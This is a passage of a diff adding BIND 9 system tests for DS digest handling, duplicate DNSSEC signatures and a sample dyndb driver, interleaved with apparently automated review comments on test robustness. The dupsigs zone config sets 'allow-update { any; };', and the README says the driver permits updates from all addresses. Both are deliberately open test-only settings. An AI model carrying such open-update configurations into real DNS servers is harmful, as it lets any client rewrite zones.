ns1 && $SHELL sign.sh diff --git a/bin/tests/system/dsdigest/tests.sh b/bin/tests/system/dsdigest/tests.sh new file mode 100644 index 0000000..c1b5661 --- /dev/null 
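Review bot: The banner comment in bin/tests/system/dsdigest/ns4/named.conf.in says `// NS3`, but every address in the file is 10.53.0.4, so it should read `// NS4`. A one-line comment on how this server differs from ns3 would also help. The visible difference is that ns3 sets `dnssec-must-be-secure . yes;` and ns4 does not, which appears to be what separates the SERVFAIL case from the insecure case in tests.sh.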
+++ b/bin/tests/system/dsdigest/tests.sh @@ -0,0 +1,54 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +# Check the good. domain + +echo_i "checking that validation with enabled digest types works" +ret=0 +$DIG $DIGOPTS a.good. @10.53.0.3 a > dig.out.good || ret=1 +grep "status: NOERROR" dig.out.good > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.good > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the bad. domain + +echo_i "checking that validation with no supported digest types and must-be-secure results in SERVFAIL" +ret=0 +$DIG $DIGOPTS a.bad. @10.53.0.3 a > dig.out.bad || ret=1 +grep "SERVFAIL" dig.out.bad > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that validation with no supported digest algorithms results in insecure" +ret=0 +$DIG $DIGOPTS bad. @10.53.0.4 ds > dig.out.ds || ret=1 +grep "NOERROR" dig.out.ds > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ds > /dev/null || ret=1 +$DIG $DIGOPTS a.bad. @10.53.0.4 a > dig.out.insecure || ret=1 +grep "NOERROR" dig.out.insecure > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.insecure > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +echo_i "exit status: $status" + +[ $status -eq 0 ] || exit 1 
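Review bot: The second and third checks in bin/tests/system/dsdigest/tests.sh match the bare words `SERVFAIL` and `NOERROR` anywhere in the dig output, whereas the first check anchors on `status: NOERROR`. These assertions are what show that a zone with only disabled DS digest types is rejected or treated as insecure, so they should match the header field: `grep "status: SERVFAIL" dig.out.bad`, `grep "status: NOERROR" dig.out.ds` and `grep "status: NOERROR" dig.out.insecure`. That keeps all three checks consistent and prevents a pass on a stray match elsewhere in the response.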
diff --git a/bin/tests/system/dupsigs/check_journal.pl b/bin/tests/system/dupsigs/check_journal.pl new file mode 100644 index 0000000..99bf690 --- /dev/null +++ b/bin/tests/system/dupsigs/check_journal.pl 
@@ -0,0 +1,211 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +sub process_changeset; + +my @changeset; + +while( my $line = <> ) { + chomp $line; + + if( $line =~ /^(?<op>add|del) (?<label>\S+)\s+(?<ttl>\d+)\s+IN\s+(?<rrtype>\S+)\s+(?<rdata>.*)/ ) { + my $change = { + op => $+{op}, + label => $+{label}, + ttl => $+{ttl}, + rrtype => $+{rrtype}, + rdata => $+{rdata}, + }; + + if( $change->{op} eq 'del' and $change->{rrtype} eq 'SOA' ) { + if( @changeset ) { + process_changeset( @changeset ); + @changeset = (); + } + } + + push @changeset, $change; + } + else { + die "error parsing journal data"; + } +} + +if( @changeset ) { + process_changeset( @changeset ); +} + +{ + my %rrsig_db; + my %keys; + my $apex; + + sub process_changeset { + my @changeset = @_; + + if( not $apex ) { + # the first record of the first changeset is guaranteed to be the apex + $apex = $changeset[0]{label}; + } + + my $newserial; + my %touched_rrsigs; + my %touched_keys; + + foreach my $change( @changeset ) { + if( $change->{rrtype} eq 'SOA' ) { + if( $change->{op} eq 'add' ) { + if( $change->{rdata} !~ /^\S+ \S+ (?<serial>\d+)/ ) { + die "unable to parse SOA"; + } + + $newserial = $+{serial}; + } + } + elsif( $change->{rrtype} eq 'NSEC' ) { + ; # do nothing + } + elsif( $change->{rrtype} eq 'DNSKEY' ) { + ; # ignore for now + } + elsif( $change->{rrtype} eq 'TYPE65534' and $change->{label} eq $apex ) { + # key status + if( $change->{rdata} !~ /^\\# (?<datasize>\d+) (?<data>[0-9A-F]+)$/ ) { + die "unable to parse key status record"; + } + + my $datasize = $+{datasize}; 
+ my $data = $+{data}; + + if( $datasize == 5 ) { + my( $alg, $id, $flag_del, $flag_done ) = unpack 'CnCC', pack( 'H10', $data ); + + if( $change->{op} eq 'add' ) { + if( not exists $keys{$id} ) { + $touched_keys{$id} //= 1; + + $keys{$id} = { + $data => 1, + rrs => 1, + done_signing => $flag_done, + deleting => $flag_del, + }; + } + else { + if( not exists $keys{$id}{$data} ) { + my $keydata = $keys{$id}; + $touched_keys{$id} = { %$keydata }; + + $keydata->{rrs}++; + $keydata->{$data} = 1; + $keydata->{done_signing} += $flag_done; + $keydata->{deleting} += $flag_del; + } + } + } + else { + # this logic relies upon the convention that there won't + # ever be multiple records with the same flag set + if( exists $keys{$id} ) { + my $keydata = $keys{$id}; + + if( exists $keydata->{$data} ) { + $touched_keys{$id} = { %$keydata }; + + $keydata->{rrs}--; + delete $keydata->{$data}; + $keydata->{done_signing} -= $flag_done; + $keydata->{deleting} -= $flag_del; + + if( $keydata->{rrs} == 0 ) { + delete $keys{$id}; + } + } + } + } + } + else { + die "unexpected key status record content"; + } + } + elsif( $change->{rrtype} eq 'RRSIG' ) { + if( $change->{rdata} !~ /^(?<covers>\S+) \d+ \d+ \d+ (?<validity_end>\d+) (?<validity_start>\d+) (?<signing_key>\d+)/ ) { + die "unable to parse RRSIG rdata"; + } + + $change->{covers} = $+{covers}; + $change->{validity_end} = $+{validity_end}; + $change->{validity_start} = $+{validity_start}; + $change->{signing_key} = $+{signing_key}; + + my $db_key = $change->{label} . ':' . 
$change->{covers}; + + $rrsig_db{$db_key} //= {}; + $touched_rrsigs{$db_key} = 1; + + if( $change->{op} eq 'add' ) { + $rrsig_db{$db_key}{ $change->{signing_key} } = 1; + } + else { + # del + delete $rrsig_db{$db_key}{ $change->{signing_key} }; + } + } + } + + foreach my $key_id( sort keys %touched_keys ) { + my $old_data; + my $new_data; + + if( ref $touched_keys{$key_id} ) { + $old_data = $touched_keys{$key_id}; + } + + if( exists $keys{$key_id} ) { + $new_data = $keys{$key_id}; + } + + if( $old_data ) { + if( $new_data ) { + print "at serial $newserial key $key_id status changed from ($old_data->{deleting},$old_data->{done_signing}) to ($new_data->{deleting},$new_data->{done_signing})\n"; + } + else { + print "at serial $newserial key $key_id status removed from zone\n"; + } + } + else { + print "at serial $newserial key $key_id status added with flags ($new_data->{deleting},$new_data->{done_signing})\n"; + } + } + + foreach my $rrsig_id( sort keys %touched_rrsigs ) { + my $n_signing_keys = keys %{ $rrsig_db{$rrsig_id} }; + + if( $n_signing_keys == 0 ) { + print "at serial $newserial $rrsig_id went unsigned\n"; + } + elsif( $rrsig_id =~ /:DNSKEY$/ ) { + if( $n_signing_keys != 2 ) { + print "at serial $newserial $rrsig_id was signed $n_signing_keys time(s) when it should have been signed twice\n"; + } + } + elsif( $n_signing_keys > 1 ) { + my @signing_keys = sort { $a <=> $b } keys %{ $rrsig_db{$rrsig_id} }; + print "at serial $newserial $rrsig_id was signed too many times, keys (@signing_keys)\n"; + } + } + } +} diff --git a/bin/tests/system/dupsigs/clean.sh b/bin/tests/system/dupsigs/clean.sh new file mode 100644 index 0000000..2af75a0 --- /dev/null +++ b/bin/tests/system/dupsigs/clean.sh 
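Review bot: The `die` calls in bin/tests/system/dupsigs/check_journal.pl (for example "error parsing journal data", "unable to parse SOA" and "unable to parse RRSIG rdata") give neither the input line number nor the offending text, so a failure in the test log cannot be traced back to a journal entry. For the top-level parser `die "error parsing journal data at line $.: $line\n";` would do, and inside process_changeset the rdata can be included the same way, e.g. `die "unable to parse SOA: $change->{rdata}\n";`. Separately, `$newserial` is assigned only when a changeset contains an `add` SOA record, so for a changeset without one the report lines would interpolate an undefined value. Giving it a placeholder default would keep that output readable.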
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out*
+rm -f ns1/named.conf
+rm -f ns1/named.lock
+rm -f ns1/named.memstats
+rm -f ns1/named.run
+rm -f ns1/signing.test.db
+rm -f ns1/signing.test.db.jbk
+rm -f ns1/signing.test.db.signed
+rm -f ns1/signing.test.db.signed.jnl
+rm -f ns1/keys/signing.test/K*
+rm -f ns1/managed-keys.bind*
diff --git a/bin/tests/system/dupsigs/ns1/named.args b/bin/tests/system/dupsigs/ns1/named.args
new file mode 100644
index 0000000..231eed4
--- /dev/null
+++ b/bin/tests/system/dupsigs/ns1/named.args
@@ -0,0 +1 @@
+-D dupsigs-ns1 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152 -T sigvalinsecs
diff --git a/bin/tests/system/dupsigs/ns1/named.conf.in b/bin/tests/system/dupsigs/ns1/named.conf.in
new file mode 100644
index 0000000..494ecfb
--- /dev/null
+++ b/bin/tests/system/dupsigs/ns1/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ recursion no;
+ max-journal-size unlimited;
+ port @PORT@;
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ pid-file "named.pid";
+};
+
+zone "signing.test" {
+ type primary;
+ masterfile-format text;
+ allow-update { any; };
+ file "signing.test.db";
+ update-check-ksk yes;
+ key-directory "keys/signing.test";
+ inline-signing yes;
+ auto-dnssec maintain;
+ sig-validity-interval 20 5;
+};
diff --git a/bin/tests/system/dupsigs/ns1/reset_keys.sh b/bin/tests/system/dupsigs/ns1/reset_keys.sh
new file mode 100644
index 0000000..4faa0bb
--- /dev/null
+++ b/bin/tests/system/dupsigs/ns1/reset_keys.sh
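Review bot: `allow-update { any; };` on the `signing.test` zone in named.conf.in lets any client that can reach the listener rewrite the zone, and the file carries no comment saying this is a deliberate test-only setting. The reach is limited by `listen-on { 10.53.0.1; };`, which is presumably an address private to the test harness, and the part of tests.sh visible here never sends a dynamic update, so it is worth checking whether the ACL is needed at all. If it is, I would put a comment on the line above it, `/* test fixture: open updates are acceptable only because named listens on 10.53.0.1 */`, so the stanza is not copied into a production configuration.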
@@ -0,0 +1,100 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=signing.test +rm -rf keys/signing.test +mkdir -p keys/signing.test + +timetodnssec() { + $PERL -e 'my ($S,$M,$H,$d,$m,$y,$x) = gmtime(@ARGV[0]); + printf("%04u%02u%02u%02u%02u%02u\n", $y+1900,$m+1,$d,$H,$M,$S);' ${1} +} + +KEYDIR=keys/signing.test +KSK=`$KEYGEN -a RSASHA256 -K $KEYDIR -q -f KSK $zone` + +ZSK0=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK1=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK2=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK3=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK4=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK5=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK6=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK7=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK8=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` +ZSK9=`$KEYGEN -a RSASHA256 -K $KEYDIR -q $zone` + +# clear all times on all keys +for FILEN in keys/signing.test/*.key +do + $SETTIME -P none -A none -R none -I none -D none $FILEN +done + +BASE=`date +%s` +BASET=`timetodnssec $BASE` + +# reset the publish and activation time on the KSK +$SETTIME -P $BASET -A $BASET $KEYDIR/$KSK + +# reset the publish and activation time on the first ZSK +$SETTIME -P $BASET -A $BASET $KEYDIR/$ZSK0 + +# schedule the first roll +R1=`expr $BASE + 50` +R1T=`timetodnssec $R1` + +$SETTIME -I $R1T $KEYDIR/$ZSK0 +$SETTIME -P $BASET -A $R1T $KEYDIR/$ZSK1 + +# schedule the second roll (which includes the delete of the first key) +R2=`expr $R1 + 50` +R2T=`timetodnssec $R2` +DT=$R2 +DTT=`timetodnssec $DT` + 
+$SETTIME -D $DTT $KEYDIR/$ZSK0 +$SETTIME -I $R2T $KEYDIR/$ZSK1 +$SETTIME -P $R1T -A $R2T $KEYDIR/$ZSK2 + +# schedule the third roll +R3=`expr $R2 + 25` +R3T=`timetodnssec $R3` + +$SETTIME -D $R3T $KEYDIR/$ZSK1 +$SETTIME -I $R3T $KEYDIR/$ZSK2 +$SETTIME -P $R2T -A $R3T $KEYDIR/$ZSK3 + +$SETTIME -P $R3T $KEYDIR/$ZSK4 + +echo KSK=$KSK +echo ZSK0=$ZSK0 +echo ZSK1=$ZSK1 +echo ZSK2=$ZSK2 +echo ZSK3=$ZSK3 +echo ZSK4=$ZSK4 + +exit + +# schedule the fourth roll +# this isn't long enough for the signing to complete and would result in +# duplicate signatures, see +# https://gitlab.isc.org/isc-projects/bind9/-/merge_requests/231#note_9597 +R4=`expr $R3 + 10` +R4T=`timetodnssec $R4` + +$SETTIME -D $R4T $KEYDIR/$ZSK2 +$SETTIME -I $R4T $KEYDIR/$ZSK3 +$SETTIME -P $R3T -A $R4T $KEYDIR/$ZSK4 diff --git a/bin/tests/system/dupsigs/ns1/signing.test.db.in b/bin/tests/system/dupsigs/ns1/signing.test.db.in new file mode 100644 index 0000000..b522b6f --- /dev/null +++ b/bin/tests/system/dupsigs/ns1/signing.test.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA ns root.ns 1996072700 3600 1800 86400 60 +@ NS ns +ns A 127.0.0.1 +ns AAAA ::1 + +$GENERATE 0-499 a${0,4,d} AAAA ::$ diff --git a/bin/tests/system/dupsigs/setup.sh b/bin/tests/system/dupsigs/setup.sh new file mode 100644 index 0000000..f687543 --- /dev/null +++ b/bin/tests/system/dupsigs/setup.sh 
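Review bot: reset_keys.sh never checks that `$KEYGEN` or `$SETTIME` succeeded, and its bare `exit` returns the status of the last `echo`, so a failed key generation still reports success to setup.sh. With an empty `KSK` or `ZSKn`, the later `$SETTIME ... $KEYDIR/$KSK` calls are handed the directory path instead of a key file, and the test then runs against a zone whose key schedule was never set up. Adding `set -e` on the line after `. $SYSTEMTESTTOP/conf.sh` would stop at the first failure (assuming nothing later in the script relies on a tolerated non-zero status); failing that, guard each name with `[ -n "$KSK" ] || exit 1`. Separately, the fourth-roll block after `exit` is unreachable and the comment explaining why sits below the `exit`; moving that comment above it would make the intent visible.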
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+test -r $RANDFILE || $GENRANDOM 800 $RANDFILE
+
+copy_setports ns1/named.conf.in ns1/named.conf
+
+cp -f ns1/signing.test.db.in ns1/signing.test.db
+(cd ns1; $SHELL ./reset_keys.sh)
diff --git a/bin/tests/system/dupsigs/tests.sh b/bin/tests/system/dupsigs/tests.sh
new file mode 100644
index 0000000..dfc88ce
--- /dev/null
+++ b/bin/tests/system/dupsigs/tests.sh
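Review bot: In setup.sh, `(cd ns1; $SHELL ./reset_keys.sh)` still runs the second command when `cd ns1` fails, and reset_keys.sh begins with `rm -rf keys/signing.test` relative to the current directory. In practice the script would not be found from the parent directory, but `(cd ns1 && $SHELL ./reset_keys.sh)` states the dependency and costs nothing. `$RANDFILE` is also expanded unquoted in `test -r $RANDFILE || $GENRANDOM 800 $RANDFILE`, which breaks if the path (set outside this file) contains whitespace.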
@@ -0,0 +1,70 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +# Wait for the zone to be fully signed before beginning test +# +# We expect the zone to have the following: +# +# - 6 signatures for signing.test. +# - 3 signatures for ns.signing.test. +# - 2 x 500 signatures for a{0000-0499}.signing.test. +# +# for a total of 1009. +fully_signed () { + $DIG axfr signing.test -p ${PORT} @10.53.0.1 > "dig.out.ns1.axfr" + awk 'BEGIN { lines = 0 } + $4 == "RRSIG" {lines++} + END { if (lines != 1009) exit(1) }' < "dig.out.ns1.axfr" +} + +# Wait for the last NSEC record in the zone to be signed. This is a lightweight +# alternative to avoid many AXFR requests while waiting for the zone to be +# fully signed. +_wait_for_last_nsec_signed() { + $DIG +dnssec a0499.signing.test -p ${PORT} @10.53.0.1 nsec > "dig.out.ns1.wait" || return 1 + grep "signing.test\..*IN.*RRSIG.*signing.test" "dig.out.ns1.wait" > /dev/null || return 1 + return 0 +} + +echo_i "wait for the zone to be fully signed" +retry_quiet 60 _wait_for_last_nsec_signed +retry_quiet 10 fully_signed || status=1 +if [ $status != 0 ]; then echo_i "failed"; fi + +start=`date +%s` +now=$start +end=$((start + 140)) + +while [ $now -lt $end ] && [ $status -eq 0 ]; do + et=$((now - start)) + echo_i "............... $et ............" 
+ $JOURNALPRINT ns1/signing.test.db.signed.jnl | $PERL check_journal.pl | cat_i + $DIG axfr signing.test -p ${PORT} @10.53.0.1 > dig.out.at$et + awk '$4 == "RRSIG" { print $11 }' dig.out.at$et | sort | uniq -c | cat_i + lines=`awk '$4 == "RRSIG" { print}' dig.out.at$et | wc -l` + if [ ${et} -ne 0 -a ${lines} -ne 1009 ] + then + echo_i "failed" + status=$((status + 1)) + fi + sleep 5 + now=`date +%s` +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dyndb/Makefile.in b/bin/tests/system/dyndb/Makefile.in new file mode 100644 index 0000000..9a862db --- /dev/null +++ b/bin/tests/system/dyndb/Makefile.in @@ -0,0 +1,23 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +SUBDIRS = driver +TARGETS = + +@BIND9_MAKE_RULES@ diff --git a/bin/tests/system/dyndb/clean.sh b/bin/tests/system/dyndb/clean.sh new file mode 100644 index 0000000..cb8ae94 --- /dev/null +++ b/bin/tests/system/dyndb/clean.sh 
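Review bot: In the polling loop of tests.sh, `$JOURNALPRINT ns1/signing.test.db.signed.jnl | $PERL check_journal.pl | cat_i` only logs what check_journal.pl finds; the pipeline's status is that of `cat_i`, so neither a `die` in the script nor a reported "went unsigned" or "signed too many times" line changes `status`. The test fails only on the RRSIG count of the AXFR sampled every five seconds, so a duplicate signature that appears and disappears between two samples would pass, if those journal messages are meant to be failures. I would capture the output and assert on it, e.g. `$JOURNALPRINT ns1/signing.test.db.signed.jnl | $PERL check_journal.pl > journal.out.at$et || status=1` followed by a `grep` for those messages, and add `journal.out*` to clean.sh. The result of `retry_quiet 60 _wait_for_last_nsec_signed` is likewise discarded.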
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after dyndb tests.
+#
+rm -f */named.conf
+rm -f */named.run
+rm -f ns1/named.memstats
+rm -f ns1/update.txt
+rm -f added.a.out.*
+rm -f added.ptr.out.*
+rm -f deleted.a.out.*
+rm -f deleted.ptr.out.*
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/dyndb/driver/AUTHORS b/bin/tests/system/dyndb/driver/AUTHORS
new file mode 100644
index 0000000..5b37853
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/AUTHORS
@@ -0,0 +1,33 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 AND ISC + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Copyright (C) 2009-2015 Red Hat + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH +REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +PERFORMANCE OF THIS SOFTWARE. + +This sample driver is based on bind-dyndb-ldap project and small portions +of code from ISC BIND 9.10. + +Authors listed in alphabetical order: +Adam Tkac <atkac@redhat.com> +Jiri Kuncar <jkuncar@redhat.com> +Martin Nagy <mnagy@redhat.com> +Petr Spacek <pspacek@redhat.com> diff --git a/bin/tests/system/dyndb/driver/Makefile.in b/bin/tests/system/dyndb/driver/Makefile.in new file mode 100644 index 0000000..a3d6726 --- /dev/null +++ b/bin/tests/system/dyndb/driver/Makefile.in 
@@ -0,0 +1,60 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+@BIND9_MAKE_INCLUDES@
+
+CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \
+ ${OPENSSL_CFLAGS}
+
+CDEFINES =
+CWARNINGS =
+
+DNSLIBS = ../../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@
+ISCLIBS = ../../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@
+
+DNSDEPLIBS = ../../../../../lib/dns/libdns.@A@
+ISCDEPLIBS = ../../../../../lib/isc/libisc.@A@
+
+DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS}
+
+LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@
+
+
+SRCS = db.c driver.c instance.c \
+ lock.c log.c syncptr.c zone.c
+
+OBJS = db.@O@ driver.@O@ instance.@O@ \
+ lock.@O@ log.@O@ syncptr.@O@ zone.@O@
+
+SO_TARGETS = lib/sample.@SO@
+TARGETS = @SO_TARGETS@
+SO_STRIP = @SO_STRIP@
+
+@BIND9_MAKE_RULES@
+
+CFLAGS = @CFLAGS@ @SO_CFLAGS@
+SO_LDFLAGS = @LDFLAGS@ @SO_LDFLAGS@
+
+lib/sample.@SO@: sample.@SO@
+ $(SHELL) ${top_srcdir}/mkinstalldirs `pwd`/lib
+ ${LIBTOOL_MODE_INSTALL} ${INSTALL} sample.@SO@ `pwd`/lib
+
+sample.@SO@: ${OBJS} ${DNSDEPLIBS} ${ISCDEPLIBS}
+ CLEANED=`echo "${DNSLIBS} ${ISCLIBS} @DNS_CRYPTO_LIBS@ ${LIBS}" | ${SO_STRIP}`; \
+ ${LIBTOOL_MODE_LINK} @SO_LD@ ${SO_LDFLAGS} -o $@ ${OBJS} \
+ $${CLEANED}
+
+clean distclean::
+ rm -f ${OBJS} sample.so lib/sample.so
diff --git a/bin/tests/system/dyndb/driver/README b/bin/tests/system/dyndb/driver/README
new file mode 100644
index 0000000..db73396
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/README
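Review bot: The `clean distclean::` rule in dyndb/driver/Makefile.in removes `sample.so` and `lib/sample.so` by literal name, while every other rule in the file builds `sample.@SO@` and `lib/sample.@SO@`. Where configure substitutes something other than `so` for `@SO@`, clean would leave a stale plugin in `lib/` that a later test run could load instead of a fresh build. The recipe should read `rm -f ${OBJS} sample.@SO@ lib/sample.@SO@`.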
@@ -0,0 +1,92 @@ +<!-- +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 and ISC + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Copyright (C) Red Hat + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH +REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +PERFORMANCE OF THIS SOFTWARE. +--> + +To use the Dynamic DB sample driver, run named and check the log. + + $ cd testing + $ named -gc named.conf + +You should be able to see something like: + +zone test/IN: loaded serial 0 +zone arpa/IN: loaded serial 0 + +This means that the sample driver created empty zones "test." and +"arpa." as defined by "arg" parameters in named.conf. + +$ dig @localhost test. + +should work as usual and you should be able to see the dummy zone with +NS record pointing to the zone apex and A record with 127.0.0.1: + +;; ANSWER SECTION: +test. 86400 IN A 127.0.0.1 +test. 86400 IN NS test. +test. 86400 IN SOA test. test. 0 28800 7200 604800 86400 + +This driver creates two empty zones and allows query/transfer/update to +all IP addresses for demonstration purposes. 
